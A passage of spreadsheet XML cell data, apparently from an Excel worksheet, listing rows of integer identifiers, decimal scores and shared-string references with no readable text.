      <c r="C4977">
        <v>2268</v>
      </c>
      <c r="D4977">
        <v>2</v>
      </c>
      <c r="E4977">
        <v>0.99620002508163452</v>
      </c>
      <c r="F4977" t="s">
        <v>5592</v>
      </c>
      <c r="G4977" t="s">
        <v>9839</v>
      </c>
      <c r="H4977" t="s">
        <v>9840</v>
      </c>
    </row>
    <row r="4978" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4978" s="1">
        <v>4976</v>
      </c>
      <c r="B4978">
        <v>6874</v>
      </c>
      <c r="C4978">
        <v>6874</v>
      </c>
      <c r="D4978">
        <v>2</v>
      </c>
      <c r="E4978">
        <v>0.88090002536773682</v>
      </c>
      <c r="F4978" t="s">
        <v>5592</v>
      </c>
      <c r="G4978" t="s">
        <v>9841</v>
      </c>
      <c r="H4978" t="s">
        <v>9842</v>
      </c>
    </row>
    <row r="4979" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4979" s="1">
        <v>4977</v>
      </c>
      <c r="B4979">
        <v>2263</v>
      </c>
      <c r="C4979">
        <v>2263</v>
      </c>
      <c r="D4979">
        <v>2</v>
      </c>
      <c r="E4979">
        <v>0.76270002126693726</v>
      </c>
      <c r="F4979" t="s">
        <v>5592</v>
      </c>
      <c r="G4979" t="s">
        <v>9843</v>
      </c>
      <c r="H4979" t="s">
        <v>9844</v>
      </c>
    </row>
    <row r="4980" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4980" s="1">
        <v>4978</v>
      </c>
      <c r="B4980">
        <v>2346</v>
      </c>
      <c r="C4980">
        <v>2346</v>
      </c>
      <c r="D4980">
        <v>2</v>
      </c>
      <c r="E4980">
        <v>0.69429999589920044</v>
      </c>
      <c r="F4980" t="s">
        <v>5592</v>
      </c>
      <c r="G4980" t="s">
        <v>9845</v>
      </c>
      <c r="H4980" t="s">
        <v>9846</v>
      </c>
    </row>
    <row r="4981" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4981" s="1">
        <v>4979</v>
      </c>
      <c r="B4981">
        <v>6873</v>
      </c>
      <c r="C4981">
        <v>6873</v>
      </c>
      <c r="D4981">
        <v>2</v>
      </c>
      <c r="E4981">
        <v>0.9968000054359436</v>
      </c>
      <c r="F4981" t="s">
        <v>5592</v>
      </c>
      <c r="G4981" t="s">
        <v>9847</v>
      </c>
      <c r="H4981" t="s">
        <v>9692</v>
      </c>
    </row>
    <row r="4982" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4982" s="1">
        <v>4980</v>
      </c>
      <c r="B4982">
        <v>6872</v>
      </c>
      <c r="C4982">
        <v>6872</v>
      </c>
      <c r="D4982">
        <v>2</v>
      </c>
      <c r="E4982">
        <v>0.76560002565383911</v>
      </c>
      <c r="F4982" t="s">
        <v>5592</v>
      </c>
      <c r="G4982" t="s">
        <v>9848</v>
      </c>
      <c r="H4982" t="s">
        <v>9849</v>
      </c>
    </row>
    <row r="4983" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4983" s="1">
        <v>4981</v>
      </c>
      <c r="B4983">
        <v>6887</v>
      </c>
      <c r="C4983">
        <v>6887</v>
      </c>
      <c r="D4983">
        <v>2</v>
      </c>
      <c r="E4983">
        <v>0.99910002946853638</v>
      </c>
      <c r="F4983" t="s">
        <v>5592</v>
      </c>
      <c r="G4983" t="s">
        <v>9850</v>
      </c>
      <c r="H4983" t="s">
        <v>9851</v>
      </c>
    </row>
    <row r="4984" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4984" s="1">
        <v>4982</v>
      </c>
      <c r="B4984">
        <v>2270</v>
      </c>
      <c r="C4984">
        <v>2270</v>
      </c>
      <c r="D4984">
        <v>2</v>
      </c>
      <c r="E4984">
        <v>0.94499999284744263</v>
      </c>
      <c r="F4984" t="s">
        <v>5592</v>
      </c>
      <c r="G4984" t="s">
        <v>9852</v>
      </c>
      <c r="H4984" t="s">
        <v>9853</v>
      </c>
    </row>
    <row r="4985" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4985" s="1">
        <v>4983</v>
      </c>
      <c r="B4985">
        <v>6904</v>
      </c>
      <c r="C4985">
        <v>6904</v>
      </c>
      <c r="D4985">
        <v>2</v>
      </c>
      <c r="E4985">
        <v>0.99650001525878906</v>
      </c>
      <c r="F4985" t="s">
        <v>5592</v>
      </c>
      <c r="G4985" t="s">
        <v>9854</v>
      </c>
      <c r="H4985" t="s">
        <v>9855</v>
      </c>
    </row>
    <row r="4986" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4986" s="1">
        <v>4984</v>
      </c>
      <c r="B4986">
        <v>6888</v>
      </c>
      <c r="C4986">
        <v>6888</v>
      </c>
      <c r="D4986">
        <v>2</v>
      </c>
      <c r="E4986">
        <v>0.90839999914169312</v>
      </c>
      <c r="F4986" t="s">
        <v>5592</v>
      </c>
      <c r="G4986" t="s">
        <v>9856</v>
      </c>
      <c r="H4986" t="s">
        <v>9857</v>
      </c>
    </row>
    <row r="4987" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4987" s="1">
        <v>4985</v>
      </c>
      <c r="B4987">
        <v>2290</v>
      </c>
      <c r="C4987">
        <v>2290</v>
      </c>
      <c r="D4987">
        <v>2</v>
      </c>
      <c r="E4987">
        <v>0.65140002965927124</v>
      </c>
      <c r="F4987" t="s">
        <v>5592</v>
      </c>
      <c r="G4987" t="s">
        <v>9858</v>
      </c>
      <c r="H4987" t="s">
        <v>9859</v>
      </c>
    </row>
    <row r="4988" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4988" s="1">
        <v>4986</v>
      </c>
      <c r="B4988">
        <v>6895</v>
      </c>
      <c r="C4988">
        <v>6895</v>
      </c>
      <c r="D4988">
        <v>2</v>
      </c>
      <c r="E4988">
        <v>0.7695000171661377</v>
      </c>
      <c r="F4988" t="s">
        <v>5592</v>
      </c>
      <c r="G4988" t="s">
        <v>9860</v>
      </c>
      <c r="H4988" t="s">
        <v>9861</v>
      </c>
    </row>
    <row r="4989" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4989" s="1">
        <v>4987</v>
      </c>
      <c r="B4989">
        <v>6898</v>
      </c>
      <c r="C4989">
        <v>6898</v>
      </c>
      <c r="D4989">
        <v>2</v>
      </c>
      <c r="E4989">
        <v>0.96609997749328613</v>
      </c>
      <c r="F4989" t="s">
        <v>5592</v>
      </c>
      <c r="G4989" t="s">
        <v>9862</v>
      </c>
      <c r="H4989" t="s">
        <v>9863</v>
      </c>
    </row>
    <row r="4990" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4990" s="1">
        <v>4988</v>
      </c>
      <c r="B4990">
        <v>6899</v>
      </c>
      <c r="C4990">
        <v>6899</v>
      </c>
      <c r="D4990">
        <v>2</v>
      </c>
      <c r="E4990">
        <v>0.72289997339248657</v>
      </c>
      <c r="F4990" t="s">
        <v>5592</v>
      </c>
      <c r="G4990" t="s">
        <v>9864</v>
      </c>
      <c r="H4990" t="s">
        <v>9865</v>
      </c>
    </row>
    <row r="4991" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4991" s="1">
        <v>4989</v>
      </c>
      <c r="B4991">
        <v>2293</v>
      </c>
      <c r="C4991">
        <v>2293</v>
      </c>
      <c r="D4991">
        <v>2</v>
      </c>
      <c r="E4991">
        <v>0.99949997663497925</v>
      </c>
      <c r="F4991" t="s">
        <v>5592</v>
      </c>
      <c r="G4991" t="s">
        <v>9866</v>
      </c>
      <c r="H4991" t="s">
        <v>9867</v>
      </c>
    </row>
    <row r="4992" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4992" s="1">
        <v>4990</v>
      </c>
      <c r="B4992">
        <v>2281</v>
      </c>
      <c r="C4992">
        <v>2281</v>
      </c>
      <c r="D4992">
        <v>2</v>
      </c>
      <c r="E4992">
        <v>0.39829999208450317</v>
      </c>
      <c r="F4992" t="s">
        <v>5592</v>
      </c>
      <c r="G4992" t="s">
        <v>9868</v>
      </c>
      <c r="H4992" t="s">
        <v>9869</v>
      </c>
    </row>
    <row r="4993" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4993" s="1">
        <v>4991</v>
      </c>
      <c r="B4993">
        <v>6900</v>
      </c>
      <c r="C4993">
        <v>6900</v>
      </c>
      <c r="D4993">
        <v>2</v>
      </c>
      <c r="E4993">
        <v>0.71840000152587891</v>
      </c>
      <c r="F4993" t="s">
        <v>5592</v>
      </c>
      <c r="G4993" t="s">
        <v>9870</v>
      </c>
      <c r="H4993" t="s">
        <v>9871</v>
      </c>
    </row>
    <row r="4994" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4994" s="1">
        <v>4992</v>
      </c>
      <c r="B4994">
        <v>6871</v>
      </c>
      <c r="C4994">
        <v>6871</v>
      </c>
      <c r="D4994">
        <v>2</v>
      </c>
      <c r="E4994">
        <v>0.99860000610351563</v>
      </c>
      <c r="F4994" t="s">
        <v>5592</v>
      </c>
      <c r="G4994" t="s">
        <v>9872</v>
      </c>
      <c r="H4994" t="s">
        <v>9873</v>
      </c>
    </row>
    <row r="4995" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4995" s="1">
        <v>4993</v>
      </c>
      <c r="B4995">
        <v>2279</v>
      </c>
      <c r="C4995">
        <v>2279</v>
      </c>
      <c r="D4995">
        <v>2</v>
      </c>
      <c r="E4995">
        <v>0.99150002002716064</v>
      </c>
      <c r="F4995" t="s">
        <v>5592</v>
      </c>
      <c r="G4995" t="s">
        <v>9874</v>
      </c>
      <c r="H4995" t="s">
        <v>9875</v>
      </c>
    </row>
    <row r="4996" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4996" s="1">
        <v>4994</v>
      </c>
      <c r="B4996">
        <v>2278</v>
      </c>
      <c r="C4996">
        <v>2278</v>
      </c>
      <c r="D4996">
        <v>2</v>
      </c>
      <c r="E4996">
        <v>0.99049997329711914</v>
      </c>
      <c r="F4996" t="s">
        <v>5592</v>
      </c>
      <c r="G4996" t="s">
        <v>9876</v>
      </c>
      <c r="H4996" t="s">
        <v>9877</v>
      </c>
    </row>
    <row r="4997" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4997" s="1">
        <v>4995</v>
      </c>
      <c r="B4997">
        <v>6901</v>
      </c>
      <c r="C4997">
        <v>6901</v>
      </c>
      <c r="D4997">
        <v>2</v>
      </c>
      <c r="E4997">
        <v>0.90499997138977051</v>
      </c>
      <c r="F4997" t="s">
        <v>5592</v>
      </c>
      <c r="G4997" t="s">
        <v>9878</v>
      </c>
      <c r="H4997" t="s">
        <v>9879</v>
      </c>
    </row>
    <row r="4998" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4998" s="1">
        <v>4996</v>
      </c>
      <c r="B4998">
        <v>2296</v>
      </c>
      <c r="C4998">
        <v>2296</v>
      </c>
      <c r="D4998">
        <v>2</v>
      </c>
      <c r="E4998">
        <v>0.91600000858306885</v>
      </c>
      <c r="F4998" t="s">
        <v>5592</v>
      </c>
      <c r="G4998" t="s">
        <v>9880</v>
      </c>
      <c r="H4998" t="s">
        <v>9881</v>
      </c>
    </row>
    <row r="4999" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4999" s="1">
        <v>4997</v>
      </c>
      <c r="B4999">
        <v>2274</v>
      </c>
      <c r="C4999">
        <v>2274</v>
      </c>
      <c r="D4999">
        <v>2</v>
      </c>
      <c r="E4999">
        <v>0.75279998779296875</v>
      </c>
      <c r="F4999" t="s">
        <v>5592</v>
      </c>
      <c r="G4999" t="s">
        <v>9882</v>
      </c>
      <c r="H4999" t="s">
        <v>9883</v>
      </c>
    </row>
    <row r="5000" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5000" s="1">
        <v>4998</v>
      </c>
      <c r="B5000">
        <v>2297</v>
      </c>
      <c r="C5000">
        <v>2297</v>
      </c>
      <c r="D5000">
        <v>2</v>
      </c>
      <c r="E5000">
        <v>0.99809998273849487</v>
      </c>
      <c r="F5000" t="s">
        <v>5592</v>
      </c>
      <c r="G5000" t="s">
        <v>9884</v>
      </c>
      <c r="H5000" t="s">
        <v>9885</v>
      </c>
    </row>
    <row r="5001" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5001" s="1">
        <v>4999</v>
      </c>
      <c r="B5001">
        <v>6891</v>
      </c>
      <c r="C5001">
        <v>6891</v>
      </c>
      <c r="D5001">
        <v>2</v>
      </c>
      <c r="E5001">
        <v>0.96530002355575562</v>
      </c>
      <c r="F5001" t="s">
        <v>5592</v>
      </c>
      <c r="G5001" t="s">
        <v>9886</v>
      </c>
      <c r="H5001" t="s">
        <v>9887</v>
      </c>
    </row>
    <row r="5002" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5002" s="1">
        <v>5000</v>
      </c>
      <c r="B5002">
        <v>2306</v>
      </c>
      <c r="C5002">
        <v>2306</v>
      </c>
      <c r="D5002">
        <v>2</v>
      </c>
      <c r="E5002">
        <v>0.91990000009536743</v>
      </c>
      <c r="F5002" t="s">
        <v>5592</v>
      </c>
      <c r="G5002" t="s">
        <v>9888</v>
      </c>
      <c r="H5002" t="s">
        <v>9889</v>
      </c>
    </row>
    <row r="5003" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5003" s="1">
        <v>5001</v>
      </c>
      <c r="B5003">
        <v>2294</v>
      </c>
      <c r="C5003">
        <v>2294</v>
      </c>
      <c r="D5003">
        <v>2</v>
      </c>
      <c r="E5003">
        <v>0.993399977684021</v>
      </c>
      <c r="F5003" t="s">
        <v>5592</v>
      </c>
      <c r="G5003" t="s">
        <v>9890</v>
      </c>
      <c r="H5003" t="s">
        <v>9891</v>
      </c>
    </row>
    <row r="5004" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5004" s="1">
        <v>5002</v>
      </c>
      <c r="B5004">
        <v>2158</v>
      </c>
      <c r="C5004">
        <v>2158</v>
      </c>
      <c r="D5004">
        <v>2</v>
      </c>
      <c r="E5004">
        <v>0.8848000168800354</v>
      </c>
      <c r="F5004" t="s">
        <v>5592</v>
      </c>
      <c r="G5004" t="s">
        <v>9892</v>
      </c>
      <c r="H5004" t="s">
        <v>9893</v>
      </c>
    </row>
    <row r="5005" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5005" s="1">
        <v>5003</v>
      </c>
      <c r="B5005">
        <v>6906</v>
      </c>
      <c r="C5005">
        <v>6906</v>
      </c>
      <c r="D5005">
        <v>2</v>
      </c>
      <c r="E5005">
        <v>0.98930001258850098</v>
      </c>
      <c r="F5005" t="s">
        <v>5592</v>
      </c>
      <c r="G5005" t="s">
        <v>9894</v>
      </c>
      <c r="H5005" t="s">
        <v>9895</v>
      </c>
    </row>
    <row r="5006" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5006" s="1">
        <v>5004</v>
      </c>
      <c r="B5006">
        <v>6907</v>
      </c>
      <c r="C5006">
        <v>6907</v>
      </c>
      <c r="D5006">
        <v>2</v>
      </c>
      <c r="E5006">
        <v>0.99570000171661377</v>
      </c>
      <c r="F5006" t="s">
        <v>5592</v>
      </c>
      <c r="G5006" t="s">
        <v>9896</v>
      </c>
      <c r="H5006" t="s">
        <v>9897</v>
      </c>
    </row>
    <row r="5007" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5007" s="1">
        <v>5005</v>
      </c>
      <c r="B5007">
        <v>6854</v>
      </c>
      <c r="C5007">
        <v>6854</v>
      </c>
      <c r="D5007">
        <v>2</v>
      </c>
      <c r="E5007">
        <v>0.99510002136230469</v>
      </c>
      <c r="F5007" t="s">
        <v>5592</v>
      </c>
      <c r="G5007" t="s">
        <v>9898</v>
      </c>
      <c r="H5007" t="s">
        <v>9899</v>
      </c>
    </row>
    <row r="5008" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5008" s="1">
        <v>5006</v>
      </c>
      <c r="B5008">
        <v>2378</v>
      </c>
      <c r="C5008">
        <v>2378</v>
      </c>
      <c r="D5008">
        <v>2</v>
      </c>
      <c r="E5008">
        <v>0.98269999027252197</v>
      </c>
      <c r="F5008" t="s">
        <v>5592</v>
      </c>
      <c r="G5008" t="s">
        <v>9900</v>
      </c>
      <c r="H5008" t="s">
        <v>9901</v>
      </c>
    </row>
    <row r="5009" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5009" s="1">
        <v>5007</v>
      </c>
      <c r="B5009">
        <v>6853</v>
      </c>
      <c r="C5009">
        <v>6853</v>
      </c>
      <c r="D5009">
        <v>2</v>
      </c>
      <c r="E5009">
        <v>0.9966999888420105</v>
      </c>
      <c r="F5009" t="s">
        <v>5592</v>
      </c>
      <c r="G5009" t="s">
        <v>9902</v>
      </c>
      <c r="H5009" t="s">
        <v>9903</v>
      </c>
    </row>
    <row r="5010" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5010" s="1">
        <v>5008</v>
      </c>
      <c r="B5010">
        <v>2227</v>
      </c>
      <c r="C5010">
        <v>2227</v>
      </c>
      <c r="D5010">
        <v>2</v>
      </c>
      <c r="E5010">
        <v>0.66360002756118774</v>
      </c>
      <c r="F5010" t="s">
        <v>5592</v>
      </c>
      <c r="G5010" t="s">
        <v>9904</v>
      </c>
      <c r="H5010" t="s">
        <v>9905</v>
      </c>
    </row>
    <row r="5011" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5011" s="1">
        <v>5009</v>
      </c>
      <c r="B5011">
        <v>2226</v>
      </c>
      <c r="C5011">
        <v>2226</v>
      </c>
      <c r="D5011">
        <v>2</v>
      </c>
      <c r="E5011">
        <v>0.65399998426437378</v>
      </c>
      <c r="F5011" t="s">
        <v>5592</v>
      </c>
      <c r="G5011" t="s">
        <v>9906</v>
      </c>
      <c r="H5011" t="s">
        <v>9907</v>
      </c>
    </row>
    <row r="5012" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5012" s="1">
        <v>5010</v>
      </c>
      <c r="B5012">
        <v>6852</v>
      </c>
      <c r="C5012">
        <v>6852</v>
      </c>
      <c r="D5012">
        <v>2</v>
      </c>
      <c r="E5012">
        <v>0.52560001611709595</v>
      </c>
      <c r="F5012" t="s">
        <v>5592</v>
      </c>
      <c r="G5012" t="s">
        <v>9908</v>
      </c>
      <c r="H5012" t="s">
        <v>9909</v>
      </c>
    </row>
    <row r="5013" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5013" s="1">
        <v>5011</v>
      </c>
      <c r="B5013">
        <v>2382</v>
      </c>
      <c r="C5013">
        <v>2382</v>
      </c>
      <c r="D5013">
        <v>2</v>
      </c>
      <c r="E5013">
        <v>0.99169999361038208</v>
      </c>
      <c r="F5013" t="s">
        <v>5592</v>
      </c>
      <c r="G5013" t="s">
        <v>9910</v>
      </c>
      <c r="H5013" t="s">
        <v>9911</v>
      </c>
    </row>
    <row r="5014" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5014" s="1">
        <v>5012</v>
      </c>
      <c r="B5014">
        <v>2225</v>
      </c>
      <c r="C5014">
        <v>2225</v>
      </c>
      <c r="D5014">
        <v>2</v>
      </c>
      <c r="E5014">
        <v>0.9976000189781189</v>
      </c>
      <c r="F5014" t="s">
        <v>5592</v>
      </c>
      <c r="G5014" t="s">
        <v>9912</v>
      </c>
      <c r="H5014" t="s">
        <v>9913</v>
      </c>
    </row>
    <row r="5015" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5015" s="1">
        <v>5013</v>
      </c>
      <c r="B5015">
        <v>2224</v>
      </c>
      <c r="C5015">
        <v>2224</v>
      </c>
      <c r="D5015">
        <v>2</v>
      </c>
      <c r="E5015">
        <v>0.99889999628067017</v>
      </c>
      <c r="F5015" t="s">
        <v>5592</v>
      </c>
      <c r="G5015" t="s">
        <v>9914</v>
      </c>
      <c r="H5015" t="s">
        <v>9915</v>
      </c>
    </row>
    <row r="5016" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5016" s="1">
        <v>5014</v>
      </c>
      <c r="B5016">
        <v>2383</v>
      </c>
      <c r="C5016">
        <v>2383</v>
      </c>
      <c r="D5016">
        <v>2</v>
      </c>
      <c r="E5016">
        <v>0.99949997663497925</v>
      </c>
      <c r="F5016" t="s">
        <v>5592</v>
      </c>
      <c r="G5016" t="s">
        <v>9916</v>
      </c>
      <c r="H5016" t="s">
        <v>9917</v>
      </c>
    </row>
    <row r="5017" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5017" s="1">
        <v>5015</v>
      </c>
      <c r="B5017">
        <v>2385</v>
      </c>
      <c r="C5017">
        <v>2385</v>
      </c>
      <c r="D5017">
        <v>2</v>
      </c>
      <c r="E5017">
        <v>0.62690001726150513</v>
      </c>
      <c r="F5017" t="s">
        <v>5592</v>
      </c>
      <c r="G5017" t="s">
        <v>9918</v>
      </c>
      <c r="H5017" t="s">
        <v>9919</v>
      </c>
    </row>
    <row r="5018" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5018" s="1">
        <v>5016</v>
      </c>
      <c r="B5018">
        <v>2223</v>
      </c>
      <c r="C5018">
        <v>2223</v>
      </c>
      <c r="D5018">
        <v>2</v>
      </c>
      <c r="E5018">
        <v>0.99849998950958252</v>
      </c>
      <c r="F5018" t="s">
        <v>5592</v>
      </c>
      <c r="G5018" t="s">
        <v>9920</v>
      </c>
      <c r="H5018" t="s">
        <v>9921</v>
      </c>
    </row>
    <row r="5019" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5019" s="1">
        <v>5017</v>
      </c>
      <c r="B5019">
        <v>2386</v>
      </c>
      <c r="C5019">
        <v>2386</v>
      </c>
      <c r="D5019">
        <v>2</v>
      </c>
      <c r="E5019">
        <v>0.89209997653961182</v>
      </c>
      <c r="F5019" t="s">
        <v>5592</v>
      </c>
      <c r="G5019" t="s">
        <v>9922</v>
      </c>
      <c r="H5019" t="s">
        <v>9923</v>
      </c>
    </row>
    <row r="5020" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5020" s="1">
        <v>5018</v>
      </c>
      <c r="B5020">
        <v>2387</v>
      </c>
      <c r="C5020">
        <v>2387</v>
      </c>
      <c r="D5020">
        <v>2</v>
      </c>
      <c r="E5020">
        <v>0.88760000467300415</v>
      </c>
      <c r="F5020" t="s">
        <v>5592</v>
      </c>
      <c r="G5020" t="s">
        <v>9924</v>
      </c>
      <c r="H5020" t="s">
        <v>9925</v>
      </c>
    </row>
    <row r="5021" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5021" s="1">
        <v>5019</v>
      </c>
      <c r="B5021">
        <v>2388</v>
      </c>
      <c r="C5021">
        <v>2388</v>
      </c>
      <c r="D5021">
        <v>2</v>
      </c>
      <c r="E5021">
        <v>0.72089999914169312</v>
      </c>
      <c r="F5021" t="s">
        <v>5592</v>
      </c>
      <c r="G5021" t="s">
        <v>9926</v>
      </c>
      <c r="H5021" t="s">
        <v>9927</v>
      </c>
    </row>
    <row r="5022" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5022" s="1">
        <v>5020</v>
      </c>
      <c r="B5022">
        <v>2372</v>
      </c>
      <c r="C5022">
        <v>2372</v>
      </c>
      <c r="D5022">
        <v>2</v>
      </c>
      <c r="E5022">
        <v>0.99010002613067627</v>
      </c>
      <c r="F5022" t="s">
        <v>5592</v>
      </c>
      <c r="G5022" t="s">
        <v>9928</v>
      </c>
      <c r="H5022" t="s">
        <v>9929</v>
      </c>
    </row>
    <row r="5023" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5023" s="1">
        <v>5021</v>
      </c>
      <c r="B5023">
        <v>2371</v>
      </c>
      <c r="C5023">
        <v>2371</v>
      </c>
      <c r="D5023">
        <v>2</v>
      </c>
      <c r="E5023">
        <v>0.99930000305175781</v>
      </c>
      <c r="F5023" t="s">
        <v>5592</v>
      </c>
      <c r="G5023" t="s">
        <v>9930</v>
      </c>
      <c r="H5023" t="s">
        <v>9931</v>
      </c>
    </row>
    <row r="5024" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5024" s="1">
        <v>5022</v>
      </c>
      <c r="B5024">
        <v>6855</v>
      </c>
      <c r="C5024">
        <v>6855</v>
      </c>
      <c r="D5024">
        <v>2</v>
      </c>
      <c r="E5024">
        <v>0.99790000915527344</v>
      </c>
      <c r="F5024" t="s">
        <v>5592</v>
      </c>
      <c r="G5024" t="s">
        <v>9932</v>
      </c>
      <c r="H5024" t="s">
        <v>9933</v>
      </c>
    </row>
    <row r="5025" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5025" s="1">
        <v>5023</v>
      </c>
      <c r="B5025">
        <v>2228</v>
      </c>
      <c r="C5025">
        <v>2228</v>
      </c>
      <c r="D5025">
        <v>2</v>
      </c>
      <c r="E5025">
        <v>0.98339998722076416</v>
      </c>
      <c r="F5025" t="s">
        <v>5592</v>
      </c>
      <c r="G5025" t="s">
        <v>9934</v>
      </c>
      <c r="H5025" t="s">
        <v>9935</v>
      </c>
    </row>
    <row r="5026" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5026" s="1">
        <v>5024</v>
      </c>
      <c r="B5026">
        <v>6909</v>
      </c>
      <c r="C5026">
        <v>6909</v>
      </c>
      <c r="D5026">
        <v>2</v>
      </c>
      <c r="E5026">
        <v>0.99510002136230469</v>
      </c>
      <c r="F5026" t="s">
        <v>5592</v>
      </c>
      <c r="G5026" t="s">
        <v>9936</v>
      </c>
      <c r="H5026" t="s">
        <v>9937</v>
      </c>
    </row>
    <row r="5027" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5027" s="1">
        <v>5025</v>
      </c>
      <c r="B5027">
        <v>6869</v>
      </c>
      <c r="C5027">
        <v>6869</v>
      </c>
      <c r="D5027">
        <v>2</v>
      </c>
      <c r="E5027">
        <v>0.98949998617172241</v>
      </c>
      <c r="F5027" t="s">
        <v>5592</v>
      </c>
      <c r="G5027" t="s">
        <v>9938</v>
      </c>
      <c r="H5027" t="s">
        <v>9939</v>
      </c>
    </row>
    <row r="5028" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5028" s="1">
        <v>5026</v>
      </c>
      <c r="B5028">
        <v>2258</v>
      </c>
      <c r="C5028">
        <v>2258</v>
      </c>
      <c r="D5028">
        <v>2</v>
      </c>
      <c r="E5028">
        <v>0.55900001525878906</v>
      </c>
      <c r="F5028" t="s">
        <v>5592</v>
      </c>
      <c r="G5028" t="s">
        <v>9940</v>
      </c>
      <c r="H5028" t="s">
        <v>9941</v>
      </c>
    </row>
    <row r="5029" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5029" s="1">
        <v>5027</v>
      </c>
      <c r="B5029">
        <v>2252</v>
      </c>
      <c r="C5029">
        <v>2252</v>
      </c>
      <c r="D5029">
        <v>2</v>
      </c>
      <c r="E5029">
        <v>0.99330002069473267</v>
      </c>
      <c r="F5029" t="s">
        <v>5592</v>
      </c>
      <c r="G5029" t="s">
        <v>9942</v>
      </c>
      <c r="H5029" t="s">
        <v>9943</v>
      </c>
    </row>
    <row r="5030" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5030" s="1">
        <v>5028</v>
      </c>
      <c r="B5030">
        <v>6913</v>
      </c>
      <c r="C5030">
        <v>6913</v>
      </c>
      <c r="D5030">
        <v>2</v>
      </c>
      <c r="E5030">
        <v>0.99860000610351563</v>
      </c>
      <c r="F5030" t="s">
        <v>5592</v>
      </c>
      <c r="G5030" t="s">
        <v>9944</v>
      </c>
      <c r="H5030" t="s">
        <v>9945</v>
      </c>
    </row>
    <row r="5031" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5031" s="1">
        <v>5029</v>
      </c>
      <c r="B5031">
        <v>6865</v>
      </c>
      <c r="C5031">
        <v>6865</v>
      </c>
      <c r="D5031">
        <v>2</v>
      </c>
      <c r="E5031">
        <v>0.48080000281333918</v>
      </c>
      <c r="F5031" t="s">
        <v>5592</v>
      </c>
      <c r="G5031" t="s">
        <v>9946</v>
      </c>
      <c r="H5031" t="s">
        <v>9947</v>
      </c>
    </row>
    <row r="5032" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5032" s="1">
        <v>5030</v>
      </c>
      <c r="B5032">
        <v>6864</v>
      </c>
      <c r="C5032">
        <v>6864</v>
      </c>
      <c r="D5032">
        <v>2</v>
      </c>
      <c r="E5032">
        <v>0.50440001487731934</v>
      </c>
      <c r="F5032" t="s">
        <v>5592</v>
      </c>
      <c r="G5032" t="s">
        <v>9948</v>
      </c>
      <c r="H5032" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="5033" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5033" s="1">
        <v>5031</v>
      </c>
      <c r="B5033">
        <v>6870</v>
      </c>
      <c r="C5033">
        <v>6870</v>
      </c>
      <c r="D5033">
        <v>2</v>
      </c>
      <c r="E5033">
        <v>0.5745999813079834</v>
      </c>
      <c r="F5033" t="s">
        <v>5592</v>
      </c>
      <c r="G5033" t="s">
        <v>9950</v>
      </c>
      <c r="H5033" t="s">
        <v>9951</v>
      </c>
    </row>
    <row r="5034" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5034" s="1">
        <v>5032</v>
      </c>
      <c r="B5034">
        <v>6750</v>
      </c>
      <c r="C5034">
        <v>6750</v>
      </c>
      <c r="D5034">
        <v>2</v>
      </c>
      <c r="E5034">
        <v>0.99089998006820679</v>
      </c>
      <c r="F5034" t="s">
        <v>5592</v>
      </c>
      <c r="G5034" t="s">
        <v>9952</v>
      </c>
      <c r="H5034" t="s">
        <v>9953</v>
      </c>
    </row>
    <row r="5035" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5035" s="1">
        <v>5033</v>
      </c>
      <c r="B5035">
        <v>2247</v>
      </c>
      <c r="C5035">
        <v>2247</v>
      </c>
      <c r="D5035">
        <v>2</v>
      </c>
      <c r="E5035">
        <v>0.86659997701644897</v>
      </c>
      <c r="F5035" t="s">
